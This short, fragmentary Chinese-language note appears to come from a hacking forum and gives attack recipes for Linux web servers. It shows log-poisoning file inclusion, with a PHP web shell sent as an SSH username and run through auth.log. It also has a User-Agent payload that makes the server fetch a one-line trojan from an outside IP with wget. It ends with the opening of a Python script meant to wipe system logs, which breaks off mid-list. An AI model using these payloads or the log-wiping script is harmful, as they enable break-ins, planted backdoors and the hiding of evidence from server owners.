-
-
2SSH:ssh '<pre><?php echo system($_GET["cmd"]); exit; ?>'@192.168.2.107 访问目标IP ahth.log将会记录SSH的错误信息。 /var/log/auth.log&cmd=id 我们直接来包含auth.log文件就O啦了。 2. /proc/self/environ这个文件 利用火狐 ie user agent <?system('wget http://172.26.36.56/php.txt -O php.php);?> http://172.26.36.56/php.txt为你的一句话木马地址
-
2#!/usr/bin/env python import os , sys , subprocess def banner(): print ''' This is linux log clear script \n Welcome to http://www.90sec.org\n Python log.py 127.0.0.1\n By:Mr,PriNce''' try: host = sys.argv[1] if len(sys.argv) < 1: banner log = ["/var/log/messages","/var/log/messages.1","/etc/syslog.conf","/var/log/secure","/var/log/message","/var/log/lastlog","/var/log/auth.log","/var/log/vsftpd.log","/var/log/apache2/access.log","/var/log/apache2/error.log","/var
